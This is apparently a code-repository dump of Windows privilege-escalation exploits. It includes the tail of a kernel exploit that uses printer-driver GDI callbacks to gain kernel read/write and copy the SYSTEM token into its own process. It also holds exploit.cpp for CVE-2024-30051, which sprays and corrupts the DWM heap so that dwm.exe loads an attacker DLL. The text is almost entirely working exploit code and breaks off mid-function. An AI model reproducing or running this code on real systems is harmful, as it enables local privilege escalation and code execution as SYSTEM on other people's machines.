sizeof(g_UmsoDest), 0); 144 | g_UmsoDest.hsurf = (HBITMAP)GetCurrentObject(HelperWindowDCScr, OBJ_BITMAP); 145 | g_UmsoDest.magic = 0x554D534F; 146 | 147 | g_pFakeObj = init_fake_obj(); 148 | FAKE_OBJ_SET_VTABLE(g_pFakeObj, 0xB0, g_kFn); 149 | 150 | FillMemory(&g_UmsoSrc, sizeof(My_UMSO), 0); 151 | g_UmsoSrc.hsurf = (HBITMAP)NtGdiEngCreateDeviceBitmap((DHSURF)g_pFakeObj, {100, 100}, BMF_1BPP);; 152 | g_UmsoSrc.magic 
= 0x554D534F; 153 | 154 | wprintf(L"[?][init] g_kReadFn = %p\n", g_kFn); 155 | wprintf(L"[?][init] g_pFakeObj = %p\n", g_pFakeObj); 156 | wprintf(L"[?][init] hScreenBitmap = %x\n", g_UmsoDest.hsurf); 157 | wprintf(L"[?][init] hBitmap = %x\n", g_UmsoSrc.hsurf); 158 | 159 | return TRUE; 160 | } 161 | 162 | VOID memmove(PVOID dst, PVOID src, SIZE_T size) { 163 | 164 | OBJ_SET_QWORD(g_pFakeObj, 0x08, src); 165 | OBJ_SET_QWORD(g_pFakeObj, 0x10, dst); 166 | OBJ_SET_DWORD(g_pFakeObj, 0x1C, size / 2); // x2 167 | 168 | OBJ_SET_DWORD(g_pFakeObj, 0x30, 0x00); 169 | OBJ_SET_DWORD(g_pFakeObj, 0x38, 0x00); 170 | 171 | OBJ_SET_DWORD(g_pFakeObj, 0x40, 0x00); // if ( *(_DWORD *)(a1 + 0x40) ) 172 | OBJ_SET_DWORD(g_pFakeObj, 0x18, 0x00); // disable if ( *(int *)(a1 + 0x18) < 0 ) 173 | 174 | OBJ_SET_DWORD(g_pFakeObj, 0x20, 0x01); // if ( !--v3 ) 175 | // break; 176 | 177 | RECTL rclDest; 178 | RECTL rclSrc; 179 | 180 | rclDest.left = 0; 181 | rclDest.top = 0; 182 | rclDest.right = 10; 183 | rclDest.bottom = 10; 184 | 185 | rclSrc.left = 0; 186 | rclSrc.top = 0; 187 | rclSrc.right = 20; 188 | rclSrc.bottom = 20; 189 | 190 | POINTL pSrc = {2, 3}; 191 | 192 | NtGdiEngStretchBltROP( 193 | &g_UmsoDest.so, &g_UmsoSrc.so, NULL, NULL, NULL, NULL, NULL, 194 | &rclDest, &rclSrc, NULL, COLORONCOLOR, NULL, 0xCCCC 195 | ); 196 | 197 | OBJ_SET_DWORD(g_pFakeObj, 0x80, 0x21); // after complete CDDMULTIBITMAPLOCK::CDDMULTIBITMAPLOCK flag will be flushed 198 | // recover it 199 | }; 200 | 201 | PVOID Read_64(PVOID address) { 202 | 203 | memmove(OBJ_LEA(g_pFakeObj, 0x2000), address, 8); 204 | 205 | return (PVOID)OBJ_GET_QWORD(g_pFakeObj, 0x2000); 206 | }; 207 | 208 | VOID Write_64(PVOID address, ULONG64 value) { 209 | OBJ_SET_QWORD(g_pFakeObj, 0x2000, value); 210 | 211 | memmove(address, OBJ_LEA(g_pFakeObj, 0x2000), 8); 212 | }; 213 | 214 | PVOID Read_kThread() { 215 | return Read_64(OBJ_LEA(g_pFakeObj, 0x210)); 216 | }; 217 | 218 | INT umpd_cb_escape(VOID *inputBuf, ULONGLONG inputBufSize, VOID 
*outputBuffer, ULONGLONG outputBufSize) { 219 | wprintf(L"[?][umpd_cb_escape][tid=%x]: STARTED \n", GetCurrentThreadId()); 220 | 221 | PVOID kThread = Read_kThread(); 222 | wprintf(L"[?][umpd_cb_escape][tid=%x]: kThread = %p\n", GetCurrentThreadId(), kThread); 223 | 224 | PVOID kProcess = Read_64(OBJ_LEA(kThread, 0x220)); 225 | wprintf(L"[?][umpd_cb_escape][tid=%x]: kProcess = %p\n", GetCurrentThreadId(), kProcess); 226 | 227 | PVOID kActiveLinks = Read_64(OBJ_LEA(kProcess, 0x448)); 228 | wprintf(L"[?][umpd_cb_escape][tid=%x]: kActiveLinks = %p\n", GetCurrentThreadId(), kActiveLinks); 229 | 230 | PVOID kP = kActiveLinks; 231 | do { 232 | kP = Read_64(OBJ_LEA(kP, 0x08)); 233 | 234 | ULONG64 pid = (ULONG64)Read_64(OBJ_LEA(kP, -0x08)); 235 | 236 | if (pid == 4) { 237 | PVOID kSystemToken = Read_64(OBJ_LEA(kP, 0x70)); 238 | 239 | wprintf(L"[?][umpd_cb_escape][tid=%x]: kSystemToken=%p\n", GetCurrentThreadId(), kSystemToken); 240 | 241 | Write_64(OBJ_LEA(kProcess, 0x4b8), (ULONG64)kSystemToken); 242 | 243 | wprintf(L"[?][umpd_cb_escape][tid=%x]: Token stolen\n", GetCurrentThreadId()); 244 | break; 245 | } 246 | } while (kP != kProcess); 247 | 248 | wprintf(L"[?][umpd_cb_escape][tid=%x]: COMPLETED \n", GetCurrentThreadId()); 249 | 250 | return TRUE; 251 | }; 252 | 253 | int 254 | __cdecl 255 | wmain( 256 | int argc, 257 | __in_ecount(argc) wchar_t* argv[]) 258 | { 259 | INIT(); 260 | 261 | wprintf(L"[?][main] PID=%x\n", GetCurrentProcessId()); 262 | wprintf(L"[?][main] TID=%x\n", GetCurrentThreadId()); 263 | system("pause"); 264 | 265 | NtGdiEngCreateDeviceBitmap = (FuncTy_NtGdiEngCreateDeviceBitmap)GetProcAddress( 266 | LoadLibraryW(L"win32u.dll"), "NtGdiEngCreateDeviceBitmap" 267 | ); 268 | NtGdiEngStretchBltROP = (FuncTy_NtGdiEngStretchBltROP)GetProcAddress( 269 | LoadLibraryW(L"win32u.dll"), "NtGdiEngStretchBltROP" 270 | ); 271 | 272 | HANDLE hPrinter = NULL; 273 | LPWSTR driverFilepath = NULL; 274 | HMODULE driverDLL = NULL; 275 | 276 | if 
(!umpd_load_printer_dll(PRINTER_NAME, hPrinter, driverFilepath, driverDLL)) { 277 | wprintf(L"[~][main] Failed to load printer driver\n"); 278 | return -1; 279 | } 280 | 281 | wprintf(L"[?][main] hPrinter = %llx\n", (ULONGLONG)hPrinter); 282 | wprintf(L"[?][main] PrinterName = %s\n", PRINTER_NAME); 283 | wprintf(L"[?][main] UMPD_Driver = %s\n", driverFilepath); 284 | wprintf(L"[?][main] UMPD_DriverDLL = %llx\n", (ULONGLONG)driverDLL); 285 | 286 | if (!umpd_set_gdi_hooks()) { 287 | wprintf(L"[~][main] Failed to set gdi hook\n"); 288 | return -2; 289 | } 290 | 291 | umpd_set_cb(INDEX_DrvEscape, umpd_cb_escape); 292 | 293 | init(); 294 | 295 | g_hdc = CreateDC(PRINTER_NAME, PRINTER_NAME, NULL, NULL); 296 | 297 | system(); 298 | 299 | return 0; 300 | } -------------------------------------------------------------------------------- /cve-2024-30051/src/exploit.cpp: -------------------------------------------------------------------------------- 1 | #define _CRT_SECURE_NO_WARNINGS 2 | #ifndef UNICODE 3 | #define UNICODE 4 | #endif 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | 15 | #include "ponylib/nt.h" 16 | #include "ponylib/win32u.h" 17 | #include "ponylib/memory.h" 18 | 19 | #include "dcomp.h" 20 | 21 | 22 | #define INIT() LoadLibraryA("user32.dll") 23 | 24 | #define ClassName L"I0p_Window" 25 | #define WindowTitle L"I0p_Window_Title" 26 | 27 | #define DCompResourceSurfaceBrushMarshaler 180 28 | #define DCompResourcePrimitiveGroupLayerClipMarshaler 128 29 | #define DCompResourceSharedSectionMarshaler 169 30 | #define DCompResourceSpriteVisualMarshaler 178 31 | #define DCompResourceLegacyRenderTargetMarshaler 94 32 | #define DCompResourceVisualTargetMarshaler 201 33 | #define DCompResourceVisualMarshaler 195 34 | #define DCompResourceCompositionGlyphRunMarshaler 33 35 | #define DCompResourceCompositionSurfaceBitmapMarshaler 40 36 | #define DCompResourceCManipulationMarshaler 103 // - 37 | #define 
DCompResourceCaptureControllerMarshaler 16 // - 38 | #define DCompResourceCVisualCaptureMarshaler 196 // - 39 | #define DCompResourceCInteractionMarshaler 87 // 40 | 41 | #define VisualTargetRootVisual 13 42 | 43 | #pragma pack(push, 1) 44 | struct My_MilRectD { 45 | float left; 46 | float top; 47 | float right; 48 | float bottom; 49 | }; 50 | struct My_CPrimitiveGroupBatchHeader{ 51 | ULONG32 field_0; 52 | ULONG32 field_4 ; 53 | ULONG32 field_8 ; 54 | ULONG32 field_C ; 55 | ULONG32 field_10; 56 | ULONG32 field_14; 57 | ULONG32 field_18; 58 | ULONG32 field_1C; 59 | ULONG32 field_20; 60 | ULONG32 field_24; 61 | ULONG32 field_28; 62 | ULONG32 field_2C; 63 | ULONG32 field_30; 64 | ULONG32 field_34; 65 | ULONG32 field_38; 66 | }; 67 | #pragma pack(pop) 68 | 69 | BOOL get_version_info(DWORD& dwBuildNumber, DWORD& dwMinorVersion, DWORD& dwMajorVersion) { 70 | OSVERSIONINFOEXW osinfo; 71 | 72 | NTSTATUS(WINAPI *RtlGetVersion)(LPOSVERSIONINFOEXW); 73 | 74 | *(FARPROC*)&RtlGetVersion = GetProcAddress(GetModuleHandleA("ntdll"), "RtlGetVersion"); 75 | 76 | if (NULL == RtlGetVersion) { 77 | return FALSE; 78 | } 79 | 80 | osinfo.dwOSVersionInfoSize = sizeof(osinfo); 81 | RtlGetVersion(&osinfo); 82 | 83 | dwBuildNumber = osinfo.dwBuildNumber; 84 | dwMinorVersion = osinfo.dwMinorVersion; 85 | dwMajorVersion = osinfo.dwMajorVersion; 86 | 87 | return TRUE; 88 | } 89 | 90 | ULONG64 get_fnCopyData_vtbl(UINT32 offset) { 91 | DWORD dwBuildNumber; 92 | DWORD dwMinorVersion; 93 | DWORD dwMajorVersion; 94 | 95 | if (get_version_info(dwBuildNumber, dwMinorVersion, dwMajorVersion) != TRUE) { 96 | return -1; 97 | } 98 | 99 | if (dwMinorVersion != 0 && dwMajorVersion != 0x0A) { 100 | return -1; 101 | } 102 | 103 | PCHAR hUser32 = (PCHAR)GetModuleHandleW(L"User32.dll"); 104 | 105 | if (dwBuildNumber == 0x4A65) { 106 | return (ULONG64)(hUser32 + 0x91070) - offset; // Windows 10 19041 107 | } 108 | 109 | return -1; 110 | } 111 | 112 | 113 | bool setup_dwm_resources_tree(dcomp_channel_t& channel, 
dcomp_shared_section_t& section, HANDLE hcomp, PUINT32 pSpriteVisual, PUINT32 pSurfaceBrush) { 114 | My_MilRectD boundsRect; 115 | 116 | // assign identifiers fo resources 117 | auto dwSurfaceBrushIndex = channel.nextIndex(); 118 | auto dwPrimitiveGroupLayerClipIndex = channel.nextIndex(); 119 | auto dwSpriteVisualMarshalerIndex = channel.nextIndex(); 120 | auto dwContainerMarshalerIndex = channel.nextIndex(); 121 | auto dwCompositionSurfaceBitmapMarshaler = channel.nextIndex(); 122 | auto dwVisualTargetIndex = channel.nextIndex(); 123 | 124 | channel.openSharedResource( 125 | dwVisualTargetIndex, 126 | (UINT64)hcomp, 127 | 0xc9, 128 | 0 129 | ); 130 | channel.createResource( 131 | DCompResourceSurfaceBrushMarshaler, 132 | dwSurfaceBrushIndex, 133 | 0 134 | ); 135 | channel.createResource( 136 | DCompResourcePrimitiveGroupLayerClipMarshaler, 137 | dwPrimitiveGroupLayerClipIndex, 138 | 0 139 | ); 140 | channel.createResource( 141 | DCompResourceSpriteVisualMarshaler, 142 | dwSpriteVisualMarshalerIndex, 143 | 0 144 | ); 145 | channel.createResource( 146 | DCompResourceVisualMarshaler, 147 | dwContainerMarshalerIndex, 148 | 0 149 | ); 150 | channel.createResource( 151 | DCompResourceCompositionSurfaceBitmapMarshaler, 152 | dwCompositionSurfaceBitmapMarshaler, 153 | 0 154 | ); 155 | auto r = channel.apply(); 156 | if (!r) { 157 | wprintf(L"[+][setup_dwm_resources_tree] failed to create resources status=%08X\n", channel.error()); 158 | return false; 159 | } 160 | 161 | wprintf(L"[+][setup_dwm_resources_tree] Resources : COMMITED \n"); 162 | wprintf(L"[+][setup_dwm_resources_tree] => VisualTarget=%08X\n", dwVisualTargetIndex); 163 | wprintf(L"[+][setup_dwm_resources_tree] => SpriteVisualMarshaler=%08X\n", dwSpriteVisualMarshalerIndex); 164 | wprintf(L"[+][setup_dwm_resources_tree] => PrimitiveGroupLayerClip=%08X\n", dwPrimitiveGroupLayerClipIndex); 165 | wprintf(L"[+][setup_dwm_resources_tree] => SurfaceBrush=%08X\n", dwSurfaceBrushIndex); 166 | 
wprintf(L"[+][setup_dwm_resources_tree] => VisualMarshaler=%08X\n", dwContainerMarshalerIndex); 167 | wprintf(L"[+][setup_dwm_resources_tree] => SurfaceBitmap=%08X\n", dwCompositionSurfaceBitmapMarshaler); 168 | 169 | /* set container as root element */ 170 | channel.setReferenceProperty( 171 | dwVisualTargetIndex, 172 | VisualTargetRootVisual, 173 | dwContainerMarshalerIndex 174 | ); 175 | channel.addVisualChild( 176 | dwContainerMarshalerIndex, 177 | dwSpriteVisualMarshalerIndex, 178 | 0, 179 | 0 180 | ); 181 | 182 | r = channel.apply(); 183 | if (!r) { 184 | wprintf(L"[+][setup_dwm_resources_tree] failed to create visual target relationship commands status=%08X\n", channel.error()); 185 | return false; 186 | } 187 | wprintf(L"[+][main] VisualTarget Relationship: COMMITED \n"); 188 | 189 | /* setup container */ 190 | channel.setFloatProperty(dwContainerMarshalerIndex, 35, 1.0f); 191 | channel.setFloatProperty(dwContainerMarshalerIndex, 36, 1.0f); 192 | 193 | channel.setFloatProperty(dwContainerMarshalerIndex, 0, 124.0f); // offset.x 194 | channel.setFloatProperty(dwContainerMarshalerIndex, 1, 12.0f); // offset.y 195 | channel.setFloatProperty(dwContainerMarshalerIndex, 2, 0.0f); // offset.z 196 | 197 | r = channel.apply(); 198 | if (!r) { 199 | wprintf(L"[+][setup_dwm_resources_tree] failed to set visual target properties status=%08X\n", channel.error()); 200 | return false; 201 | } 202 | 203 | wprintf(L"[+][setup_dwm_resources_tree] VisualTarget Properties : COMMITED \n"); 204 | 205 | /* setup clip */ 206 | channel.setIntegerProperty( 207 | dwPrimitiveGroupLayerClipIndex, 208 | 4, 209 | 0x4000 210 | ); 211 | channel.setIntegerProperty( 212 | dwPrimitiveGroupLayerClipIndex, 213 | 3, 214 | 0x0000 215 | ); 216 | 217 | // [2] >= *a1 && [3] >= [1]; 218 | boundsRect.left = 15; // [0] 219 | boundsRect.top = 1; // [1] 220 | boundsRect.right = 64; // [2] 221 | boundsRect.bottom = 10; // [3] 222 | 223 | channel.setBufferProperty( 224 | dwPrimitiveGroupLayerClipIndex, 225 
| 6, 226 | &boundsRect, 227 | sizeof(My_MilRectD) 228 | ); 229 | channel.setReferenceProperty( 230 | dwPrimitiveGroupLayerClipIndex, 231 | 2, 232 | section.index() 233 | ); 234 | 235 | UINT32 surfacesSources[1] = { (UINT32)dwCompositionSurfaceBitmapMarshaler }; 236 | 237 | channel.setReferenceArrayProperty( 238 | dwPrimitiveGroupLayerClipIndex, 239 | 0, 240 | surfacesSources, 241 | 1 242 | ); 243 | 244 | r = channel.apply(); 245 | if (!r) { 246 | wprintf(L"[+][setup_dwm_resources_tree] failed to process primitive group layer clip commands status=%08X\n", channel.error()); 247 | return false; 248 | } 249 | wprintf(L"[+][setup_dwm_resources_tree] PrimitiveGroupLayerClip : COMMITED \n"); 250 | 251 | /* setup brush */ 252 | 253 | My_MilRectD rect; 254 | rect.left = 15; // [0] 255 | rect.top = 1; // [1] 256 | rect.right = 64; // [2] 257 | rect.bottom = 10; // [3] 258 | 259 | channel.setBufferProperty( 260 | dwSurfaceBrushIndex, 261 | 1, 262 | &rect, 263 | sizeof(My_MilRectD) 264 | ); 265 | channel.setReferenceProperty( 266 | dwSurfaceBrushIndex, 267 | 0, 268 | dwPrimitiveGroupLayerClipIndex 269 | ); 270 | 271 | r = channel.apply(); 272 | if (!r) { 273 | wprintf(L"[+][setup_dwm_resources_tree] failed to process surface brush commands status=%08X\n", channel.error()); 274 | return false; 275 | } 276 | 277 | wprintf(L"[+][setup_dwm_resources_tree] SurfaceBrush : COMMITED \n"); 278 | 279 | /* setup sprite */ 280 | // set size 281 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 24, 169.0f); // size.x 282 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 25, 169.0f); // size.y 382 283 | // set offset 284 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 0, 382.0f); // offset.x 285 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 1, 88.0f); // offset.y 286 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 2, 0.0f); // offset.z 287 | 288 | r = channel.apply(); 289 | if (!r) { 290 | wprintf(L"[+][setup_dwm_resources_tree] failed to process 
sprite visual commands status=%08X\n", channel.error()); 291 | return false; 292 | } 293 | 294 | wprintf(L"[+][setup_dwm_resources_tree] SpriteVisual Properties: COMMITED \n"); 295 | 296 | *pSpriteVisual = dwSpriteVisualMarshalerIndex; 297 | *pSurfaceBrush = dwSurfaceBrushIndex; 298 | 299 | return true; 300 | } 301 | 302 | void setup_shared_section_data(LPVOID pSharedSectionData) { 303 | auto lpBatchHeaderPG = (My_CPrimitiveGroupBatchHeader*)pSharedSectionData; 304 | 305 | auto targetLFHSize = 0x6C0; 306 | 307 | // sizeof(CManipulationMarshaler) + sizeof(Gadgets) 308 | // -> sizeof(Gadgets) = sizeof(GadgetsData) + sizeof(HeapEntry) 309 | // -> maximum size of gadgets that we could have is 0x8F 310 | // -> btw we could use negative offset to overcome limitation above 311 | lpBatchHeaderPG->field_10 = targetLFHSize + 0x80 + 0x08; // batches_1 312 | lpBatchHeaderPG->field_C = targetLFHSize + 0x300; // for stability purposes it should not to be allocated in the same LFH bucket 313 | lpBatchHeaderPG->field_0 = 0x01; 314 | 315 | lpBatchHeaderPG->field_1C = -1; 316 | 317 | PCHAR pTriggerData = (PCHAR)(pSharedSectionData) + sizeof(My_CPrimitiveGroupBatchHeader); 318 | memset(pTriggerData, 0x41, lpBatchHeaderPG->field_10); 319 | 320 | // set values to satisfy CPrimitiveGroup::ValidateBatches 321 | // if ( *(_DWORD *)(i + a2) > 3u || *(_DWORD *)(i + a2 + 0xC) > 7u ) 322 | for (int i = 0; i < 12; i++ ) { 323 | *(DWORD*)(pTriggerData + i * 0x90) = 0x0; 324 | *(DWORD*)(pTriggerData + i * 0x90 + 0x0C) = 0x0; 325 | } 326 | 327 | wprintf(L"[+][exploit] setup shared section data : OK\n"); 328 | // setup gadgets 329 | // pBuffer + sizeof(buffer) + sizeof(heapentry) 330 | 331 | CHAR acsPayloadPath [256] = {0}; 332 | // GetCurrentDirectoryA(256, acsPayloadPath); 333 | 334 | strcat(acsPayloadPath, "C:\\dumps\\payload.dll"); 335 | 336 | PCHAR command = acsPayloadPath; 337 | 338 | // because actual object ptr is shifted on 8 we have to add 8 to gadgets data 339 | // v79 = 
CInteraction::CInteraction(v78, (struct CComposition *)a1); 340 | // ActualObjectPtr = (void **)((char *)v79 + 8); <----- ??? 341 | 342 | PCHAR pGadgetsData = pTriggerData + targetLFHSize + 0x10 + 0x08; 343 | *(PULONG64)(pGadgetsData) = get_fnCopyData_vtbl(0xB0); 344 | *(PULONG32)(pGadgetsData + 0x08) = 1; // number of pointers for FixupCallbackPointers 345 | *(PULONG64)(pGadgetsData + 0x20) = 0; 346 | *(PULONG32)(pGadgetsData + 0x18) = 0x30; 347 | *(PULONG64)(pGadgetsData + 0x68) = (ULONG64)GetProcAddress(LoadLibraryA("kernel32.dll"), "LoadLibraryA"); 348 | 349 | wprintf(L"[+][exploit] LoadLibraryA: %p\n", (PVOID)(*(PULONG64)(pGadgetsData + 0x68))); 350 | 351 | *(PULONG64)(pGadgetsData + 0x28) = 0x38; 352 | *(PULONG64)(pGadgetsData + 0x30) = 0x28; 353 | 354 | strcpy(pGadgetsData + 0x38, command); 355 | 356 | wprintf(L"[+][exploit] setup gadgets : OK\n"); 357 | } 358 | 359 | bool normalize_LFH(dcomp_channel_t& channel, UINT32 resourceType, int count) { 360 | for (int i = 0; i < count; i++) { 361 | int dwIndex = channel.nextIndex(); 362 | 363 | channel.createResource( 364 | resourceType, 365 | dwIndex, 366 | 0 367 | ); 368 | } 369 | 370 | if ( !channel.apply() ) { 371 | return false; 372 | } 373 | return true; 374 | } 375 | 376 | BOOL create_window_class(std::wstring className) { 377 | WNDCLASSEXW wcex; 378 | memset(&wcex, 0, sizeof(WNDCLASSEXW)); 379 | 380 | wcex.cbSize = sizeof(WNDCLASSEX); 381 | 382 | wcex.lpfnWndProc = DefWindowProc; 383 | wcex.lpszClassName = className.c_str(); 384 | wcex.cbClsExtra = 0; 385 | wcex.cbWndExtra = 0; 386 | wcex.hInstance = GetModuleHandleA(NULL); 387 | 388 | if (RegisterClassExW(&wcex) == NULL) { 389 | return FALSE; 390 | } 391 | return TRUE; 392 | } 393 | 394 | BOOL destroy_window_class(std::wstring className) { 395 | return UnregisterClassW(className.c_str(), GetModuleHandle(0)); 396 | }; 397 | 398 | HWND create_window(std::wstring className, std::wstring windowName, DWORD width, DWORD height) { 399 | HWND hwnd = CreateWindowW( 
400 | className.c_str(), 401 | windowName.c_str(), 402 | WS_OVERLAPPEDWINDOW, 403 | CW_USEDEFAULT, 404 | 0, 405 | width, 406 | height, 407 | nullptr, 408 | nullptr, 409 | nullptr, 410 | nullptr 411 | ); 412 | 413 | return hwnd; 414 | } 415 | 416 | 417 | UINT32 dwm_pid() { 418 | ponylib::nt::proc_snapshot_t ntsnap; 419 | 420 | if (!NT_SUCCESS( ntsnap.build() ) ) { 421 | return -1; 422 | } 423 | 424 | auto dwm_processes = ntsnap.filter([](auto& proc){ return proc.filename == L"dwm.exe"; }); 425 | if (dwm_processes.size() == 0) { 426 | return -1; 427 | } 428 | 429 | return dwm_processes.back().processId; 430 | } 431 | 432 | bool attempt(int iAttempt, int numberOfLFHAllocations, int numberOfMessagesToPass, int numberOfLFHAllocationsForNormalization, UINT32 dwTypeIdForLFHAllocations) { 433 | bool bAttemptOk = true; 434 | 435 | auto counter = 0; 436 | 437 | auto dwmProcessId = dwm_pid(); 438 | 439 | HWND hwnd = NULL; 440 | HANDLE hcomp = NULL; 441 | 442 | UINT32 dwSpriteVisual; 443 | UINT32 dwSurfaceBrush; 444 | 445 | SIZE_T sizeCh = 0x40000; 446 | 447 | std::shared_ptr ch = nullptr; 448 | std::shared_ptr section = nullptr; 449 | 450 | if ( FALSE == create_window_class(ClassName) ) { 451 | wprintf(L"[+][attempt][%d] failed to create window class. GetLastError(): %08x\n", iAttempt, GetLastError()); 452 | bAttemptOk = false; 453 | goto cleanup; 454 | } 455 | 456 | hwnd = create_window(ClassName, WindowTitle, 900, 672); 457 | if ( NULL == hwnd ) { 458 | wprintf(L"[+][attempt][%d] failed to create window. GetLastError(): %08x\n", iAttempt, GetLastError()); 459 | bAttemptOk = false; 460 | goto cleanup; 461 | } 462 | 463 | ShowWindow(hwnd, 1); 464 | UpdateWindow(hwnd); 465 | 466 | wprintf(L"[+][attempt][%d] hwnd=%p\n", iAttempt, hwnd); 467 | 468 | 469 | auto ntstatus = (*ponylib::win32u::kNtUserCreateDCompositionHwndTarget)( 470 | hwnd, 471 | 1, 472 | &hcomp 473 | ); 474 | if (!NT_SUCCESS(ntstatus)) { 475 | wprintf(L"[+][attempt][%d] failed to create window. 
status=%08x\n", iAttempt, ntstatus); 476 | bAttemptOk = false; 477 | goto cleanup; 478 | } 479 | 480 | wprintf(L"[+][attempt][%d] hcomp=%p\n", iAttempt, hcomp); 481 | 482 | ch = std::make_shared(sizeCh); 483 | if (!ch->ok()) { 484 | wprintf(L"[+][attempt][%d] failed to create channel. status=%08x\n", iAttempt, ch->error()); 485 | bAttemptOk = false; 486 | goto cleanup; 487 | } 488 | 489 | wprintf(L"[+][attempt][%d] hch=%p\n", iAttempt, ch->hch()); 490 | 491 | section = std::make_shared(ch.get(), ch->nextIndex(), DCompResourceSharedSectionMarshaler, 0x4000); 492 | if (!section->ok()) { 493 | wprintf(L"[+][attempt][%d] failed to create shared section. status=%08x\n", iAttempt, section->error()); 494 | bAttemptOk = false; 495 | goto cleanup; 496 | } 497 | wprintf(L"[+][attempt][%d] SharedSection : OK\n", iAttempt); 498 | wprintf(L"[+][attempt][%d] => SharedSection=%08X\n", iAttempt, section->index()); 499 | wprintf(L"[+][attempt][%d] => hSharedSection=%p\n", iAttempt, section->handle()); 500 | wprintf(L"[+][attempt][%d] => pSharedSection=%p\n", iAttempt, section->base()); 501 | 502 | setup_shared_section_data(section->base()); 503 | 504 | bAttemptOk = setup_dwm_resources_tree( 505 | *ch, 506 | *section, 507 | hcomp, 508 | &dwSpriteVisual, 509 | &dwSurfaceBrush 510 | ); 511 | if (!bAttemptOk) { 512 | wprintf(L"[+][attempt][%d] failed to create resources hierarchy\n", iAttempt); 513 | bAttemptOk = false; 514 | goto cleanup; 515 | } 516 | 517 | wprintf(L"[+][attempt][%d] make allocations in LFH: %d\n", iAttempt, numberOfLFHAllocations); 518 | 519 | int dwTriggerResource[256]; 520 | int iTriggerResource = 0; 521 | 522 | auto normalizationOk = normalize_LFH(*ch, dwTypeIdForLFHAllocations, numberOfLFHAllocationsForNormalization); 523 | if (!normalizationOk) { 524 | wprintf(L"[+][attempt][%d] => LFH normalization failed: %d\n", iAttempt, numberOfLFHAllocationsForNormalization); 525 | bAttemptOk = false; 526 | goto cleanup; 527 | } 528 | 529 | wprintf(L"[+][attempt][%d] => 
LFH normalization: OK (%d)\n", iAttempt, numberOfLFHAllocationsForNormalization); 530 | 531 | for (int i = 0; i < numberOfLFHAllocations; i++) { 532 | int dwIndex = ch->nextIndex(); 533 | 534 | ch->createResource( 535 | dwTypeIdForLFHAllocations, 536 | dwIndex, 537 | 0 538 | ); 539 | 540 | dwTriggerResource[iTriggerResource++] = dwIndex; 541 | 542 | if (dwmProcessId != dwm_pid()) { 543 | wprintf(L"[+][attempt][%d] dwm crash detected during LFH allocations. Reset.\n", iAttempt ); 544 | bAttemptOk = false; 545 | goto cleanup; 546 | } 547 | 548 | // wprintf(L"[+][attempt][%d] -> LFH Allocated: %d (%d)\n", iAttempt, dwIndex, i ); 549 | } 550 | if ( !ch->apply() ) { 551 | wprintf(L"[+][attempt][%d] failed to create resources in LFH\n status=%08x", iAttempt, ch->error() ); 552 | bAttemptOk = false; 553 | goto cleanup; 554 | } 555 | 556 | wprintf(L"[+][attempt][%d] => LFH bruteforce: OK (%d)\n", iAttempt, numberOfLFHAllocations); 557 | 558 | // trigger vulnerability 559 | ch->setReferenceProperty( 560 | dwSpriteVisual, 561 | 51, 562 | dwSurfaceBrush 563 | ); 564 | if ( !ch->apply() ) { 565 | wprintf(L"[+][attempt][%d] failed to set trigger\n status=%08x", iAttempt, ch->error() ); 566 | bAttemptOk = false; 567 | goto cleanup; 568 | } 569 | 570 | wprintf(L"[+][attempt][%d] Trigger : COMMITED \n", iAttempt); 571 | 572 | for (int i = 0 ; i < numberOfMessagesToPass; i++ ) { 573 | MSG msg; 574 | // Main message loop: 575 | GetMessage(&msg, nullptr, 0, 0); 576 | wprintf(L"[+][attempt][%d]: wparam=%p lparam=%p msg=%d\n", iAttempt, (LPVOID)msg.wParam, (LPVOID)msg.lParam, msg.message); 577 | if (!TranslateAccelerator(msg.hwnd, NULL, &msg)) 578 | { 579 | TranslateMessage(&msg); 580 | DispatchMessage(&msg); 581 | } 582 | } 583 | 584 | Sleep(5000); 585 | 586 | ch->apply(); 587 | ch->apply(); 588 | ch->apply(); 589 | ch->apply(); 590 | ch->apply(); 591 | ch->apply(); 592 | ch->apply(); 593 | ch->apply(); 594 | ch->apply(); 595 | ch->apply(); 596 | 597 | for (int i = 0; i < 
iTriggerResource; i++) { 598 | auto dwIndex = dwTriggerResource[i]; 599 | wprintf(L"[+][attempt][%d] -> LFH Release: %d (%d)\n", iAttempt, dwIndex, i ); 600 | 601 | ch->releaseResource(dwIndex); 602 | } 603 | if ( !ch->apply() ) { 604 | wprintf(L"[+][attempt][%d] failed to release resources in LFH\n status=%08x", iAttempt, ch->error() ); 605 | bAttemptOk = false; 606 | goto cleanup; 607 | } 608 | 609 | Sleep(5000); 610 | 611 | HANDLE hFile = CreateFileA("C:\\dumps\\pwned.txt", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 612 | if (hFile != INVALID_HANDLE_VALUE) { 613 | wprintf(L"[+][attempt][%d] exploitation completed. Bye!\n", iAttempt); 614 | bAttemptOk = true; 615 | goto cleanup; 616 | } 617 | 618 | bAttemptOk = false; 619 | 620 | wprintf(L"[+][attempt][%d] exploitation failed. Let's try again!\n", iAttempt); 621 | 622 | cleanup: 623 | if (section){ 624 | section.reset(); 625 | } 626 | 627 | if (ch) { 628 | ch.reset(); 629 | } 630 | if (hcomp) { 631 | (*ponylib::win32u::kNtUserDestroyDCompositionHwndTarget)( 632 | hwnd, 633 | hcomp 634 | ); 635 | } 636 | if (hwnd) { 637 | DestroyWindow(hwnd); 638 | } 639 | destroy_window_class(ClassName); 640 | 641 | return bAttemptOk; 642 | } 643 | 644 | bool exploit() { 645 | auto bExploitOk = true; 646 | auto iAttempt = 0; 647 | 648 | auto prevDwmProcessId = 0; 649 | auto numberOfLFHAllocations = 33; 650 | auto defaultNumberOfLFHAllocations = numberOfLFHAllocations; 651 | auto defaultNumberOfLFHAllocationsForNormalization = 0x1000; 652 | 653 | while(true) { 654 | auto dwmProcessId = dwm_pid(); 655 | wprintf(L"[+][attempt][%d] dwmProcId=%d LFHAllocations=%d\n", iAttempt, dwmProcessId, numberOfLFHAllocations); 656 | 657 | if (attempt(iAttempt, numberOfLFHAllocations, 3, defaultNumberOfLFHAllocationsForNormalization, DCompResourceCInteractionMarshaler)) { 658 | break; 659 | } 660 | 661 | if (prevDwmProcessId == 0) { 662 | prevDwmProcessId = 